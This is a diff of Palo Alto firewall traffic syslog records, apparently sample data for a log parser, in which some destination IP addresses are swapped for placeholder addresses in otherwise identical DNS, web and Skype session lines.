 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8
-Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7
